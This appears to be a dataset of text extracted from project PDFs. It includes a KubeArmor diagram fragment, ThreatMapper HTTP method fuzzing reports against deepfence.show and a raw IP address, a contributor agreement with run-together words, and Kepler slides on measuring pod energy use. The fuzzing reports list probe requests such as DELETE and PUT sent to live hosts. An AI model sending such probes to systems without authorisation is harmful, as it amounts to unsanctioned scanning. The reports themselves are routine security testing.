\nPPID: 10, PID: 11 \nType: MatchedPolicy \nPolicyName: Policy #1 \nSource: /bin/dash, Resource: /bin/ls \nAction: Block \nResult: Permission Denied Summary Summary \nKubernetes \nMultiple VMs \n(KVM Service) \nSelf-managed VM Platform Handler \n(k8s, docker, containerd) \nKVM Agent KubeArmor \nCore Engine AppArmor \nEnforcer \nSELinux \nEnforcer \nSystem \nMonitor \nLogger \n(Feeder) gRPC Service \nkarmor CLI Alerts \nLogs BPF-LSM \nEnforcer \nKubeArmor " } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-14 19_09_17.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 5/Security Test Suite 1/http://deepfence.show TestCase\nSummary\nStarted at 2021-04-14 19:09:17\nTime taken 00:00:09.476\nTotal scans performed: 62\nIssues found: 11\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 11 11\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest PURGE http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codesAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest COPY http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest UNLOCK http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest LOCK http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod LOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest PROPFIND http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest PATCH http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest OPTIONS http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNINGEndpoint http://deepfence.show/\nRequest HEAD http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest DELETE http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest PUT http://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://deepfence.show/\nRequest POST http://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 301 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #11" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2022-08-17 10_01_51.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 2/Security Test Suite 1/https://137.184.10.129 TestCase\nSummary\nStarted at 2022-08-17 10:01:51\nTime taken 00:00:26.936\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PURGE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest COPY https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest UNLOCK https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest LOCK https://137.184.10.129/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PROPFIND https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PATCH https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest TRACE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest OPTIONS https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest HEAD https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest DELETE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PUT https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest POST https://137.184.10.129/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2022-08-04 21_39_16.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 2/Security Test Suite 1/https://137.184.10.129 TestCase\nSummary\nStarted at 2022-08-04 21:39:16\nTime taken 00:00:10.373\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PURGE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest COPY https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest UNLOCK https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest LOCK https://137.184.10.129/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PROPFIND https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PATCH https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest TRACE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest OPTIONS https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest HEAD https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest DELETE https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PUT https://137.184.10.129/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest POST https://137.184.10.129/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Observability and Analysis", "file_name": "test.pdf", "project_name": "OpenSearch", "subcategory": "Observability" }
[ { "data": "This is a test, with umlauts, from München\nAlso contains newlines for testing.\nAnd one more." } ]
{ "category": "Observability and Analysis", "file_name": "ContributorAgreement.pdf", "project_name": "Graylog", "subcategory": "Observability" }
[ { "data": "TORCH Contributor Agreement\nThisTORCHContributorAgreement(“TCA”)appliestoanycontributionthatyoumaketoanyproductorproject                      \nmanagedbyus(the“project”),andsetsouttheintellectualpropertyrightsyougranttousinthecontributed                        \nmaterials.Theterm“us”shallmeanTORCHGmbH.Theterm“you”shallmeanthepersonorentityidentified                     \nbelow.Ifyouagreetobeboundbytheseterms,pleasefillintheinformationrequestedbelowandsigntheTCA                        \nwhereindicatedbelow.Readthisagreementcarefullybeforesigning.Thesetermsandconditionsconstitutea                      \nbinding legal agreement. \n1.Theterm”contribution”or”contributedmaterials”meansanysourcecode,objectcode,patch,tool,                  \nsample,graphic,specification,manual,documentation,oranyothermaterialpostedorsubmittedbyyou                     \nto the project. \n2.With respect to any worldwide copyrights, or copyright applications and registrations, in your contribution:\n○youherebyassigntousjointownership,andtotheextentthatsuchassignmentisorbecomes                     \ninvalid,ineffectiveorunenforceable,youherebygranttousaperpetual,irrevocable,                  \nnon­exclusive,worldwide,no­charge,royalty­free,unrestrictedlicensetoexerciseallrightsunder                 \nthosecopyrights.Thisincludes,atouroption,therighttosublicensethesesamerightstothird                    \nparties through multiple levels of sublicensees or other licensing arrangements; \n○youagreethateachofuscandoallthingsinrelationtoyourcontributionasifeachofuswere                       \nthe sole owners, and if one of us makes\ni.aderivativeworkofyourcontribution,theonewhomakesthederivativework(orhasit                    \nmade) will be the sole owner of that derivative work; \nii.youagreethatyouwillnotassertanymoralrightsinyourcontributionagainstus,our                  \nlicensees or transferees; \niii.youagreethatwemayregisteracopyrightinyourcontributionandexerciseall                   \nownership rights associated with it; and \niv.youagreethatneitherofushasanydutytoconsultwith,obtaintheconsentof,payor                    \nrender an accounting to the other for any use or distribution of your contribution. \n3.Withrespecttoanypatentsyouown,orthatyoucanlicensewithoutpaymenttoanythirdparty,youhereby                      \ngrant to us a perpetual, irrevocable, non­exclusive, worldwide, no­charge, royalty­free license to:\n○make,havemade,use,sell,offertosell,import,andotherwisetransferyourcontributionin                   \nwholeorinpart,aloneorincombinationwithorincludedinanyproduct,workormaterials                      \narising out of the project to which your contribution was submitted, and\n○atouroption,tosublicensethesesamerightstothirdpartiesthroughmultiplelevelsof                   \nsublicensees or other licensing arrangements. \n4.Exceptassetoutabove,youkeepallright,title,andinterestinyourcontribution.Therightsthatyougrant                      \ntousunderthesetermsareeffectiveonthedateyoufirstsubmittedacontributiontous,evenifyour                        \nsubmissiontookplacebeforethedateyousigntheseterms.Anycontributionwemakeavailableunder                   \nanylicensewillalsobemadeavailableunderasuitableFSF(FreeSoftwareFoundation)orOSI(Open                      \nSource Initiative) approved license.\n5.You covenant, represent, warrant and agree that: \n○eachcontributionthatyousubmitisandshallbeanoriginalworkofauthorshipandyoucan                    \nlegally grant the rights set out in this TCA; \n○tothebestofyourknowledge,eachcontributionwillnotviolateanythirdparty'scopyrights,                   \ntrademarks, patents, or other intellectual property rights; and \n○each contribution shall be in compliance with any applicable export control laws.\npage 1/26.Youagreetonotifyusifyoubecomeawareofanycircumstancewhichwouldmakeanyoftheforegoing                       \nrepresentationsinaccurateinanyrespect.TORCHGmbHmaypubliclydiscloseyourparticipationinthe                    \nproject, including the fact that you have signed the TCA. \n7.ThisTCAisgovernedbyGermanlaw.Theplaceofjurisdictionforalldisputesarisingdirectlyorindirectly                        \nfrom the TCA is Hamburg, Germany.\n8.ShouldanyprovisionoftheAgreementbeorbecomeinvalid,thisshallnotaffectthevalidityofthe                      \nremainingterms.ThePartiesshallinsuchaneventbeobligedtocooperateinthecreationofterms                     \nwhichachievesuchlegallyvalidresultascomesclosestcommerciallytothatoftheinvalidprovision.The                    \nabove shall apply accordingly to the closing of any gaps in the Agreement. \n9.Please place an “x” on one of the applicable statement below. Please do NOT mark both statements: \n___ I am signing on behalf of myself as an individual and no other person or entity, \nincluding my employer, has or will have rights with respect my contributions. \n___ I am signing on behalf of my employer or a legal entity and I have the actual \nauthority to contractually bind that entity. \nName*: \nMailing Address*:\nTelephone, Fax *:\nProject Name*:\nSignature*: \nDate*: \nUsername (if applicable):\nCompany's Name (if applicable):\nTitle or Role (if applicable):\n* required field\nPlease fax to +49 (0) 40 609 452 011 or email to hello@torch.sh.\npage 2/2" } ]
{ "category": "Observability and Analysis", "file_name": "OSS-NA22.pdf", "project_name": "Kepler", "subcategory": "Observability" }
[ { "data": "Sustainability \nthe Container Native Way \nHuamin Chen \nRed Hat \nTwitter @root_fs \nGithub rootfs \n#ossummit Chen Wang \nIBM Research \nTwitter @wangchen615 \nGithub wangchen615 #ossummit \nAgenda \n•Background \n•Introduction to Project Kepler \n•Next Steps \n•Community \n•Demo #ossummit \nEnergy Measurement \n•Energy measurement theory and \nmethodology \n–How to measure energy consumption, \nindirectly? \n•Energy consumption attribution problem \nand methodology \n–How much energy used by the Pods? #ossummit \nPower Measurement Theory \nThere are several factors contributing to the CPU power consumption; they include dynamic \npower consumption, short-circuit power consumption, and power loss due to transistor leakage \ncurrents :\nThe dynamic power consumption originates from the activity of logic gates inside a CPU. When \nthe logic gates toggle, energy is flowing as the capacitors inside them are charged and \ndischarged. The dynamic power consumed by a CPU is approximately proportional to the CPU \nfrequency, and to the square of the CPU voltage: \nwhere C is the switched load capacitance, f is frequency, V is voltage \nSource: https://en.wikipedia.org/wiki/Processor_power_dissipation \nleakage current is a \nfunction of thermal \ntemperature \nFrequency based \ntuning to optimize \ndynamic power \nconsumption. #ossummit \nEnergy Measurement Methodology : Ideal vs Reality \nMeasure Target Ideal Way Reality Solution \nFrequency Monitor each circuit \nfrequency Linux kernel CPU \nfrequency governor \ndynamically changes \nfrequency for energy \nsaving or performance \nobjectives Use average \nfrequency (aperf) to \napproximate \nCapacitance Monitor the number \nof circuits powered \nonThere is no such way \non CPUs Use the number of \nCPU instructions to \napproximate \nExecution Time Monitor the duration \nof circuits staying \npowered on There is no such way \non CPUs Use the CPU cycles \nto approximate \nIndirect measurement to approach the truth in an imperfect world #ossummit \nEnergy Consumption Attribution Problem \nPower Supply \nProcess \n Process \n Process \n Process \n Process \n Process Container Container Container Pod Pod\nHow to attribute \npower consumption \non shared resources \nto processes, \ncontainers, or Pods? 10% CPU usage 50% CPU usage #ossummit \nEnergy Consumption Attribution Methodology \nPower Supply \nProcess \n Process \n Process \n Process \n Process \n Process Container Container Container Pod Pod\nPower consumption \nis attributed to the \nresource usage by \nprocesses, \ncontainers. and Pods 10% CPU usage \nmeans 10% CPU \npower consumption 50% CPU usage means 50% \nCPU power consumption #ossummit \nPut Together \n•Use software counters to measure power \nconsumption by hardware resources \n–ML models are used for approximation. \n•Use hardware resource utilization to \nattribute power consumption by \nprocesses, containers, and Pods. \n#ossummit \n9 - Reduced computational \nresource used by the \nprobe \n- Using eBPF R egr e ssion R educ tion \n- Support ML models to \nestimate energy \nconsumption \n- Science based \napproach R eporting \n- Per Pod level energy \nconsumption reporting, \nincluding CPU/GPU, RAM \n- Support bare metal as well \nas VM \n- Support Prometheus \nhttps://github.com/sustainable-computing-io/kepler \nKepler: Kubernetes-based Efficient Power Level Export er#ossummit \nData Collection Data Aggregation Data Modeling Data Presentation \nLinux Kernel \nTracepoint Performance Counter RAPL \nhwmon stats cgroupfs \nstats GPU \nstats(nvml) \nPID, Cgroup ID \nCPU cycles \nCPU time \nCPU instructions \nCache misses \n….EnergyPo\nd= (CPU stats, Memory stats, GPU stats, cgroupfs stats, \nhwmon stats)\nEnergy stats as Metrics Counters Kepler Architecture \nModel Server Power \nEstimate \nModel \nRAPL \nPer Container \nData Aggregate \nData Aggregate \nEstimate Metrics Per Container \nEstimate \nMetrics \ndataset = \ntfio.experimental.IODataset.stream.from_prometheus(...) \n …… \nmodel = tf.keras.models.Sequential(...) \n …… \nmodel.fit(dataset….) \n Kepler \nModel Server Metrics Scraping \nDownload \nModel \nModel Server trains ML models that use software counters to approximate power consumption. #ossummit \nSetup \n-Bare Metal Machine \n-Intel Xeon 4210 \n-NVIDIA T4 Graphics Card / 20 cores / 2.20 GHz / 32 GB RAM / 20 TB bandwidth \n-MicroShift \n-NVIDIA GPU Operator \n-Kepler \n-kube-prometheus Demo #ossummit \nDemo \nSteps: \n1.Deploy Kepler Exporter as a DaemonSet \n2.Check Kepler exported data in Kepler logs and endpoint \n3.Configure Prometheus and Metric Scape \n4.Load Kepler Grafana Dashboard \n5.Test CPU intensive workload \n6.Test GPU intensive workload #ossummit \nSupported Data Stats \n•CPU Stats \n–Energy, model, time and frequency \n–Hardware Performance Counters \n•Memory \n–Cache misses, resident memory size \n•GPU \n–Energy, resident memory size \n•Block Device \n–Read/write stats #ossummit \nNext Steps \n•Energy consumption and carbon emissions \ntelemetry and dashboard. \n•Kepler and Model Server provide tuning and \nscheduling heuristics. \n–Dynamic power reduction \n•Energy Aware Pod Scheduling \n•DVFS based Vertical Pod Scaling \n•Energy Efficient Node Tuning \n–Leaky power reduction \n•Thermal Temperature Aware Scheduling and Scaling \n#ossummit \nCommunity \nhttps://github.com/sustainable-computing-io https://sustainableco-ese6814.slack.com/archives/C02VCJ8K8LT \nBackup Slides #ossummit \nExisting 